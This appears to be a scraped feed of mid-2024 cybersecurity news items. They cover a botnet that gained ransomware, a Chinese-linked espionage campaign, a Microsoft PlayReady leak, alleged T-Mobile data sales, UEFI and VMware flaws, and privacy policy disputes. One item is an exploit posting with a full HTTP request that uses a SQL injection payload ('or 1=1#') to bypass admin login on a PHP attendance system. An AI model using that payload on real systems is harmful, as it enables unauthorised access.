For a while, the botnet spread but did essentially nothing. All the malicious payloads came well after.

Source: Phil Degginger via Alamy Stock Photo

A previously harmless Linux botnet has been updated to include a suite of malicious and exploitative components.

The unimaginatively named "P2PInfect" is a worm that leverages the Redis in-memory database application to spread across networks in a peer-to-peer, worm-like manner, creating a botnet along the way. By the time it was first discovered about a year ago, it had yet to cause anyone any real damage — a fact which it used to stealthy effect, by creating very little ruckus in newly infected networks.

This is not the case anymore. According to Cado Security, an update has been propagated across P2PInfect infections globally which includes a brand new rootkit, cryptominer, and even ransomware.

"Last year we were sitting there, scratching our heads, going: 'Why?,'" Al Carchrie, R&D lead solutions engineer at Cado Security, recalls about seeing the innocuous botnet for the first time. "It wasn't until the last couple of weeks that we saw there had been changes — it seems to have grown arms and legs."

**How PRPInfect Started**

On first impression, researchers observed a few things about P2PInfect that they could explain, and a few they couldn't.

First, the known: P2PInfect targeted misconfigured Redis-integrated servers accessible from the Internet. With such an inroad into a network, the malware took advantage of Redis' leader-follower topology, in which a designated "leader" node handles the primary copy of some data, and spreads exact copies to a network of follower nodes. The program used this mechanism to spread itself between Redis nodes across networks.

This seemed to be a good way to establish command-and-control (C2) and potentially spread second-stage malware. At the time, though, this quasi botnet wasn't being used for much at all.

Researchers did note, though, that the word "miner" popped up in P2PInfect's code — a potential indication of what was to come, perhaps, but nothing more.

"Our best estimate was that they were trying to do an initial spread as a botnet, probably to get a significant mass, so that when their plan came into action, it would then be more effective because they'll have a significant number of hosts," Carchrie says.

That prediction has now come to fruition.

**How P2PInfect Is Going**

P2PInfect has been updated with a usermode rootkit, and its "miner" binary has been activated. In the time since, the malware has leveraged its victims to mine around 71 Monero coins, equivalent to around £10,000.

Interesting, too, is a new ransomware component targeting a variety of file types including .xls, .py, .sql, and more. Though scary in theory, this aspect of P2PInfect seems to have been thought through the least.

For one thing, the ransomware looks for specific file extensions, but Linux does not necessarily require that files have extensions to begin with.

More to the point: Redis doesn't save any data to disk by default—its whole value proposition surrounds storage in-memory. It can be configured to save data to files, but the extension for these files—.rdb—is not among those sought by the ransomware. "With that in mind," Cado wrote, "it's unclear what the ransomware is actually designed to ransom."

**What to Do**

From Carchrie's vantage point, P2PInfect infections appear to be most concentrated in East Asia.

Redis is commonly used in businesses across the globe, though. Its open source version has more than four billion Docker pulls, and nearly 10,000 organizations use its Enterprise product, including British Airways and MGM Resorts.

So, he warns, organizations have to watch that their servers are properly protected from outside threats — only exposed to trusted users, behind firewalls, properly configured, etc.

And while it's not so easy to spot totally dormant malware, now that P2PInfect is revved up, it should be leaving behind plenty of easily detectable artifacts. "The cryptomining is going to drain as much CPU as possible, and the ransomware will go after files on disks, so disk utilization then starts to spike as well. You'll be looking for indications of those," he says.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'P2PInfect' Worm Grows Teeth With Miner, Ransomware &amp; Rootkit

Student Attendance Management System version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06/22/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account.STATUS: CRITICAL- Vulnerability[+]Exploits:- Exploit:```POSTPOST /student_attendance/ajax.php?action=login HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Accept-Language: en-USSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Platform: "Windows"Origin: https://pwnedhost.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pwnedhost.com/student_attendance/login.phpAccept-Encoding: gzip, deflate, brPriority: u=1, iConnection: keep-aliveusername=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid```[+]Response```HTTPHTTP/1.1 200 OKDate: Sat, 22 Jun 2024 06:37:41 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://www.patreon.com/posts/student-system-1-106665723)## Proof and Exploit:[href](https://www.patreon.com/posts/student-system-1-106665723)## Time spent:01:25:00

Student Attendance Management System 1.0 SQL Injection

Plus: Alleged Apple source code leaks online, cybercrime group Scattered Spider's alleged kingpin gets arrested, and more.

The rolling series of breaches targeting customers of cloud platform Snowflake appears to be a supply chain attack wrapped in another supply chain attack. A hacker who claims to have been involved in the attacks tells WIRED that the hackers, known as ShinyHunter, stole victims’ Snowflake credentials by first breaching an employee of a third-party contractor. (The contractor, however, says it does not believe it was involved.)

Ultimately, the breach of the Snowflake customer accounts, which include Ticketmaster, banking firm Santander, and potentially more than 160 other companies, was possible because their Snowflake accounts did not have multifactor authentication enabled.

Antivirus giant Kaspersky’s worst nightmare has finally come true: The United States government announced on Thursday that it is banning the sale of its software to new customers in the US over alleged Russian national security threats. (Kaspersky has challenged the Biden administration’s claims.) Existing customers, meanwhile, will be banned from downloading Kaspersky software updates after September 29. What could go wrong?

Perplexity AI, an artificial-intelligence-powered search startup, says it’s already valued at a billion dollars. But a WIRED investigation published this week found that its secret sauce has a pungent ingredient: bullshit.

Beyond “hallucinating” details generated by its chatbot, WIRED found that the AI tool appears to be ignoring the Robots Exclusion Protocol—a standard web tool used to prevent scraping—on sites owned by WIRED’s parent company, Condé Nast, and other publications, seemingly allowing it to scrape articles despite the internet equivalent of a “Do Not Enter” sign hanging on WIRED and other Condé Nast sites. Perplexity’s chatbot later plagiarized that same article when prompted.

People traveling through some of the largest train stations in the United Kingdom secretly had their faces scanned by Amazon’s face-recognition tools, according to documents obtained by WIRED. The technology, which was used as part of a trial run, predicted travelers’ various attributes, including gender, age, and likely emotions. The surveillance, which one privacy advocate called “concerning,” could potentially be used for serving advertisements.

Finally, we detailed the rise of robot “dogs” used by militaries, explained what would happen if China invaded Taiwan, and got into the nitty-gritty of the boring-sounding but serious work of spotting the billion-dollar scam tactic known as business email compromise.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

For months, ransomware gangs have rampaged across the health care industry, with ruthless attacks targeting Change Healthcare’s national payment network for more than a thousand health care providers, Ascension Healthcare’s 140 hospitals, and dozens of other victims in the medical field. Now that hacking epidemic is crystallizing into yet another catastrophic hospital hack—one that has resulted in the data of 300 million UK patient records leaking online.

Synnovis, a joint-venture medical testing company partially owned by the UK’s National Health Service, has for weeks been battling and negotiating with the Russia-linked ransomware group Qilin, which has deeply disrupted its services in an attempt to extort the company. The result has been well over a thousand postponed operations and thousands more postponed outpatient appointments across multiple UK hospitals. Ambulances have been diverted from the affected hospitals, potentially causing delays in lifesaving care. They’ve even had to ask for new urgent donations of O-type blood, as testing disruptions have prevented other types from being used in patients’ blood transfusions.

A Catastrophic Hospital Hack Ends in a Leak of 300M Patient Records

Government ministries keep falling victim to relatively standard-fare cyber-espionage attacks, like this latest campaign with hazy Chinese links.

Source: Mint Images Limited via Alamy Stock Photo

A Chinese-language advanced persistent threat (APT) has been spying on government ministries across the eastern hemisphere.

The first signs of it date back to late August of last year. Back then, the as-yet-unidentified group began to use a modified version of Gh0st RAT, nicknamed "SugarGh0st RAT," to spy on targets in South Korea, as well as the Ministry of Foreign Affairs in Uzbekistan. Since then, Cisco Talos revealed in a new blog post, the group now called "SneakyChef" has been cooking up new campaigns across more countries.

Based on its lure documents, likely targets for the campaign have included:

*   Ministries of foreign affairs from Angola, India, Kazakhstan, Latvia, and Turkmenistan
    
*   The ministries of agriculture and forestry, and fisheries and marine resources in Angola
    
*   The Saudi Arabian embassy in Abu Dhabi
    

Talos has not attributed SneakyChef to any particular government itself. They did note, however, the Chinese language preferences present in its code, its use of SugarGh0st RAT — particularly, though not exclusively popular among Chinese threat actors — and the similar profile of its targets.

**Sneaky Chef's Latest Servings**

Where early campaigns utilized malicious RAR files embedded in LNK files for initial infection, now SneakyChef prefers self-extracting RARs (SFX RAR). The shift offers some modest benefits.

"RAR files just got official support in Windows 11, so for anything prior to Windows 11, you need to have extra software to be able to extract the file," explains Nick Biasani, Cisco Talos' head of outreach. "A self-extracting RAR file eliminates the need for extra software, so it probably increases the likelihood of infection."

Among the goodies SFX RAR drops: a decoy document, a dynamic link library (DLL) loader, some encrypted malware — either SugarGh0st RAT or SneakyChef's newest tool, SpiceRAT — and a malicious Visual Basic (VB) script for establishing persistence.

The decoys are legitimate, scanned documents relating in some way to the targeted ministry or embassy. They'll describe some kind of government business, most often an upcoming meeting or conference. Notably, Talos was unable to find any of the documents used in recent campaigns on the open web. (This might indicate they were themselves obtained via espionage.)

When it comes to government cyberespionage, "What we commonly see is that this would be the 'first wave.' This actor is not typically highly sophisticated, they're more aiming to send a lot of lures and get a lot of people infected so they can get initial footholds and start gathering data," Biasani says. Then, when they need access to a specific, extra-secured government body. "That's when you start seeing the more sophisticated elements of these attacks play out."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'SneakyChef' APT Slices Up Foreign Affairs With SugarGh0st

On June 11, 2024, a Microsoft Engineer posted information about a crash that inadvertently leaked internal data related to PlayReady and Warbird libraries.

    Hello All,On Jun 11, 2024 Microsoft engineer posted on a public foruminformation about a crash experienced with Apple TV service on aSurface Pro 9 device [1].The post had an attachment - a 771MB file (4GB unpacked), which leakedinternal code (260+ files [2]) pertaining to Microsoft PlayReady suchas the following:- Warbird configuration for building PlayReady library- Warbird library implementing code obfuscation functionality- static libraries with symbolic information either required orrelated to PlayReady client library building, this includes OEM,crypto, ARM TEE / HW related libs a preprocessed C++ header file withPlayReady constants, unpublished classes and their methods declarationIn general the above leaked key information related to PlayReadyinternals and implementation. Leaked data should be sufficient tocompletely reverse engineer Microsoft PlayReady operation (HW basedone in particular).As such, on Jun 12, 2024 we notified Microsoft PlayReady and MSRCabout the leak shortly following its discovery.We verified that it is possible to buildWindows.Media.Protection.PlayReady.dll  library (debug build andwithout Warbird encryption / obfuscation) from the leaked code. Afollow up post by another Microsoft engineer provided guidelines onhow to proceed with the building process [4] (this post has been alsoremoved).We also verified that Microsoft Symbol Server didn’t block request forPDB file corresponding to Microsoft internal warbird.dll binary(another leak / bug at Microsoft end).The leak violated Microsoft's own guidelines [5] for posting linkrepro information in public. These guidlines clearly state thefollowing among others:- "All information in reports and any comments and replies arepublicly visible by default"- "Don't put anything you want to keep private in the title or contentof the initial report, which is public"- "To maintain your privacy and keep your sensitive information out ofpublic view, be careful"The described leaks are yet another manifestation of what we have beenalready aware of - the problems and inconsistencies observed atMicrosoft end with respect to PlayReady security and the way secrecyof the implementation is implemented and/or maintained by the company.While Microsoft removed the post (within 12 hours from thenotification), the company hasn't removed the leak itself so far [3].There are some chances this post is to put Microsoft to action though...Thank you.Best Regards,Adam Gowdiak----------------------------------Security Explorations -AG Security Research Labhttps://security-explorations.com----------------------------------References:[1] MSPR leak (screenshot 1)    https://security-explorations.com/samples/mspr_leak_screenshot.png[2] MSPR leak (files list)    https://security-explorations.com/samples/mspr_leak_files.txt[3] MSPR leak (screenshot 2)    https://security-explorations.com/samples/mspr_leak_screenshot2.png[4] MSPR leak (screenshot 3)    https://security-explorations.com/samples/mspr_leak_screenshot3.png[5] How to report a problem with the Microsoft C++ toolset ordocumentation (Reports and privacy)    https://learn.microsoft.com/en-us/cpp/overview/how-to-report-a-problem-with-the-visual-cpp-toolset?view=msvc-170#reports-and-privacy

Microsoft PlayReady Data Leak

IntelBroker is offering source code from major companies for sale. Are they demonstrating the value of a zero-day they are also selling?

A moderator of the notorious data breach trading platform BreachForums is offering data for sale they claim comes from a data breach at T-Mobile.

The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, t-mobile.com certifications, and “Siloprograms.” (We’ve not heard of siloprograms, and can’t find a reference to them anywhere, so perhaps it’s a mistranslation or typo.)

Post offereing data for sale supposedly from a T-Mobile internal breach

To prove they had the data, IntelBroker posted several screenshots showing access with administrative privileges to a Confluence server and T-Mobile’s internal Slack channels for developers.

But according to sources known to BleepingComputer, the data shared by IntelBroker actually consists of older screenshots. These screenshots show T-Mobile’s infrastructure, posted at a known—yet unnamed—third-party vendor’s servers, from where they were stolen.

When we looked at the screenshots IntelBroker attached to their post, we spotted something interesting in one of them.

Found CVE-2024-1597

This screenshot shows a search query for a critical vulnerability in Jira, a project management tool used by teams to plan, track, release and support software. It’s typically a place where you could find the source code of works in progress.

The search returns the result CVE-2024-1597, a SQL injection vulnerability. SQL injection happens when a cybercriminal injects malicious SQL code into a form on a website, such as a login page, instead of the data the form is asking for. The vulnerability affects Confluence Data Center and Server according to Atlassian’s May security bulletin.

For a better understanding, it’s important to note that Jira and Confluence are both products created by Atlassian, where Jira is the project management and issue tracking tool and Confluence is the collaboration and documentation tool. They are often used together.

If IntelBroker has a working exploit for the SQL injection vulnerability, this could also explain their claim that they have the source code of three internal tools used at Apple, including a single sign-on authentication system known as AppleConnect.

This theory is supported by the fact that IntelBroker is also offering a Jira zero-day for sale.

IntelBroker selling zero-day for JIra

> “I’m selling a zero-day RCE for Atlassian’s Jira.
> 
> Works for the latest version of the desktop app, as well as Jira with confluence.
> 
> No login is required for this, and works with Okta SSO.”

If this is true then this exploit, or its fruits, might be used for data breaches that involve personal data.

Meanwhile, T-Mobile has denied it has suffered a breach, saying it is investigating whether there has been a breach at a third-party provider.

> “We have no indication that T-Mobile customer data or source code was included and can confirm that the bad actor’s claim that T-Mobile’s infrastructure was accessed is false.”

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Was T-Mobile compromised by a zero-day in Jira? 

The old, but newly disclosed, vulnerability is buried deep inside personal computers, servers, and mobile devices, and their supply chains, making remediation a headache.

Source: Alexander Cimbal via Alamy Stock Photo

A vast swath of computers is likely to be affected by a newly published vulnerability in Intel processors.

CVE-2024-0762, unfortunately nicknamed "UEFIcanhazbufferoverflow," is a buffer overflow issue affecting multiple versions of Phoenix Technologies' SecureCore Unified Extensible Firmware Interface (UEFI) firmware. First disclosed by the vendor in May, it has now been described in detail by Eclypsium researchers in a blog post.

They first spotted it back in November, while analyzing UEFI images in Lenovo ThinkPad X1 Carbon 7th Gen and X1 Yoga 4th Gen laptops. The problem lies in an unsafe call to the GetVariable() runtime service, used for reading the contents of a UEFI variable. A lack of adequate checks could allow an attacker to feed it too much data, thereby causing an overflow. From there, the attacker could take advantage by escalating privileges and executing code in a targeted machine during runtime.

Even worse than the severity of the bug, though, is its spread. Intel supplies the majority of PC processors sold around the world, and SecureCore firmware runs on 10 different generations of Intel chips. Eclypsium estimates it could affect hundreds of PC models across a wide spectrum of vendors.

**The Rub With UEFI**

There are few areas of a machine where malicious attacks are so effective, and so difficult to excise, as UEFI and its predecessor, BIOS. As the firmware interface that controls how a system boots, it is the first and most privileged code that runs once a user hits the power button on their device.

Its special status has attracted attackers far and wide in recent years, allowing them to nab root-level privileges, establish persistence through reboots, bypass security programs that might otherwise catch more traditional malware, and more.

"It's not not really the greatest place to hack into, but it is a really good place to set up shop," explains Nate Warfield, director of threat research and intelligence with Eclypsium.

"If you have code execution during that stage of a computer booting, you can drop something into the boot sector. Or you can use this vector to inject malware into Windows before it starts." He points to the recent CosmicStrand UEFI rootkit as a case in point. It's also what makes UEFIcanhazbufferoverflow so dangerous.

Still, it was only assigned a "high" 7.5 out of 10 in the CVSS scoring system. That, Warfield says, comes down to a couple of factors.

First, it requires that an attacker already have access to their targeted machine. 

Additionally, unlike your typical headline vulnerability, exploits in this case may need to be customized to a certain degree depending on the targeted computer model's configuration, and the permissions assigned to the problematic variable, adding a certain degree of complexity to the whole affair.

**The Good News and (More) Bad**

Unfortunately, this same complexity extends to vendors developing patches.

"The vulnerability we found affected a whole bunch of different versions of \[Phoenix's\] UEFI code. So they had to patch all of those for their customers, and now everyone has to go and pull those and package them up for all the versions of their BIOS," Warfield explains. "They may end up having to fix 10, 15, or 20 different tiny differences \[in architecture\] because this one supports this many GPUs, this one supports different hardware configurations for the motherboard. It's impossible to know."

Lenovo — which coordinated with the researchers in recent months — started releasing fixes last month, though some computers will remain exposed until later in the summer. Other, more recently informed original equipment and design manufacturers will surely take even longer. Organizations using Intel-powered computers can do little more than twiddle their thumbs in the meantime.

"This is the whole supply chain problem in a nutshell," Warfield says. "We informed the vendor. We have to wait for them to tell their customers' OEMs, who have to package their fixes and deliver it to their customers, who are the end users."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

High-Risk Overflow Bug in Intel Chips Likely Impacts 100s of PC Models

The FTC has referred a complaint against TikTok and its parent company ByteDance to the Department of Justice.

The Federal Trade Commission (FTC) has announced it’s referred a complaint against TikTok and parent company ByteDance to the Department of Justice.

The investigation originally focused on Musical.ly which was acquired by ByteDance on November 10, 2017, and merged it into TikTok.

The FTC started a compliance review of Musical.ly following a 2019 settlement with the company for violations of the Children’s Online Privacy Protection Act (COPPA). In the settlement, Musical.ly received a fine of $5.7m for collecting personal information from children without parental consent.

One of the main concerns was that Musical.ly did not ask the user’s age and later failed to go back and request age information for people who already had accounts.

COPPA requires sites and services like Musical.ly and TikTok – among other things – to get parental consent before collecting personal information from children under 13.

Musical.ly also failed to deal with complaints properly. The FTC found that—in just a two-week period in September 2016—the company received over 300 complaints from parents asking Musical.ly to delete their child’s account. However, under COPPA it’s not enough just to delete existing accounts, companies have to remove the kids’ videos and profiles from the company’s servers; Musical.ly failed to do this.

In 2022, TikTok itself faced a $28m fine for failing to protect children’s privacy after an investigation of a possible breach of the UK’s data protection laws.

In the US, TikTok agreed to pay $92 million in 2021 to settle dozens of lawsuits alleging that it harvested personal data from users, including information using facial recognition technology, without consent, and shared the data with third parties.

The FTC states that during the investigation it uncovered reasons to believe that “defendants are violating or are about to violate the law and that a proceeding is in the public interest.”

The FTC also said it usually doesn’t publicize the referral of complaints but feels it is in the public interest to do so now.

TikTok has been in the crosshairs of privacy and security professionals and politicians for years.

In June 2022,  the FCC (Federal Communications Commission), called on the CEOs of Apple and Google to remove TikTok from their app stores considering it an unacceptable national security risk because of its Chinese ownership.

In 2023, General Paul Nakasone, Director of the National Security Agency (NSA) referred to TikTok as a loaded gun in the hands of America’s TikTok-addicted youth.

Recently, we reported about the take-over of some high-profile TikTok accounts just by opening a Direct Message.

And the clock is ticking when it comes to TikTok’s presence in the US, after the US Senate has approved a bill that would effectively ban TikTok from the US unless Chinese owner ByteDance gives up its share of the still immensely popular app.

Somehow we don’t think we’ve heard the last of this.

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

 TikTok facing fresh lawsuit in US over children&#8217;s privacy 

A trio of bugs could allow hackers to escalate privileges and remotely execute code on virtual machines deployed across cloud environments.

Source: Schoening via Alamy Stock Photo

Broadcom has released fixes for three vulnerabilities affecting VMware vCenter, two of which are of critical severity and allow remote code execution (RCE). The disclosures come as virtual machines (VMs) continue to attract the notice of hackers, thanks to the rich repositories of sensitive data and applications they tend to house. Patching immediately is a good idea.

vCenter is the centralized management console for VMware virtual environments, and is used to view and manage VMs, multiple ESXi hosts, and all dependent components from a single centralized location. CVE-2024-37079 and CVE-2024-37080 are heap overflow vulnerabilities in vCenter's implementation of DCERPC — short for Distributed Computing Environment/Remote Procedure Call — used for calling a function on a remote machine as if it were a local one.

DCERPC is useful for engaging with remote machines, especially if you're a remote hacker. Using a specially crafted network packet, an attacker with network access can take advantage of these vulnerabilities to remotely execute their own code on VMs managed by vCenter. The potential for harm has earned both vulnerabilities critical 9.8 out of 10 scores on the CVSS scale.

Broadcom also patched a number of local privilege escalation vulnerabilities resulting from a misconfiguration of sudo within vCenter. Short for "superuser do" or "substitute user do," sudo allows users in Unix systems to run commands with the privileges of another user — at the root level by default. An authenticated local user can take advantage of the bug labeled CVE-2024-37081 to obtain administrative privileges on a vCenter Server appliance. It has been assigned a high CVSS score of 7.8.

As yet, there is no evidence that any of these three vulnerabilities have been exploited in the wild — though that could quickly change. Remediations can be found here, and an accompanying Q&A page here.

**The Risk in Cloud VMs**

According to its own documentation, VMware sports more than 400,000 customers, including 100% of all Fortune 500 and Fortune Global 100 companies. Its technology supports more than 80% of virtualized workloads and a good chunk of business critical applications.

"The increasing popularity of cloud computing has led to a corresponding surge in VM usage, consolidating multiple applications onto a single physical server," explains Patrick Tiquet, vice president of security and architecture at Keeper Security. "This consolidation not only enhances operational efficiency but also presents attackers with the opportunity to compromise a variety of services through a single breach."

vCenter Server epitomizes this risk. As the centralized management software supporting the VMWare vSphere and Cloud Foundation platforms, it provides a launch point for both IT administrators and hackers to reach many VMs running across organizations.

"Successful breaches not only disrupt services and dole out financial losses, but can also lead to the exposure of sensitive data and violations of regulatory requirements, severely damaging an organization’s reputation," Tiquet warns, so patching new vulnerabilities as they crop up is both necessary and insufficient for organizations to be at ease.

Besides network segmentation, vulnerability audits, and other security hardening tactics like incident response planning and maintaining robust backups, he says, it's the job of network administrators to lead from the front: "Administrators should always ensure they’re using a secure vault and secrets management solution, they must apply necessary updates as soon as possible, and they should also check their cloud console’s security controls to ensure they’re following the latest recommendations."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Critical VMware Bugs Open Swaths of VMs to RCE, Data Theft

A controversial proposal put forth by the European Union to scan users' private messages for detection child sexual abuse material (CSAM) poses severe risks to end-to-end encryption (E2EE), warned Meredith Whittaker, president of the Signal Foundation, which maintains the privacy-focused messaging service of the same name.
"Mandating mass scanning of private communications fundamentally

A controversial proposal put forth by the European Union to scan users' private messages for detection child sexual abuse material (CSAM) poses severe risks to end-to-end encryption (E2EE), warned Meredith Whittaker, president of the Signal Foundation, which maintains the privacy-focused messaging service of the same name.

"Mandating mass scanning of private communications fundamentally undermines encryption. Full Stop," Whittaker said in a statement on Monday.

"Whether this happens via tampering with, for instance, an encryption algorithm's random number generation, or by implementing a key escrow system, or by forcing communications to pass through a surveillance system before they're encrypted."

The response comes as law makers in Europe are putting forth regulations to fight CSAM with a new provision called "upload moderation" that allows for messages to be scrutinized ahead of encryption.

A recent report from Euractiv revealed that audio communications are excluded from the ambit of the law and that users must consent to this detection under the service provider's terms and conditions.

"Those who do not consent can still use parts of the service that do not involve sending visual content and URLs," it further reported.

Europol, in late April 2024, called on the tech industry and governments to prioritize public safety, warning that security measures like E2EE could prevent law enforcement agencies from accessing problematic content, reigniting an ongoing debate about balancing privacy vis-à-vis combating serious crimes.

It also called for platforms to design security systems in such a way that they can still identify and report harmful and illegal activity to law enforcement, without delving into the implementation specifics.

iPhone maker Apple famously announced plans to implement client-side screening for child sexual abuse material (CSAM), but called it off in late 2022 following sustained blowback from privacy and security advocates.

"Scanning for one type of content, for instance, opens the door for bulk surveillance and could create a desire to search other encrypted messaging systems across content types," the company said at the time, explaining its decision. It also described the mechanism as a "slippery slope of unintended consequences."

Signal's Whittaker further said calling the approach "upload moderation" is a word game that's tantamount to inserting a backdoor (or a front door), effectively creating a security vulnerability ripe for exploitation by malicious actors and nation-state hackers.

"Either end-to-end encryption protects everyone, and enshrines security and privacy, or it's broken for everyone," she said. "And breaking end-to-end encryption, particularly at such a geopolitically volatile time, is a disastrous proposition."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple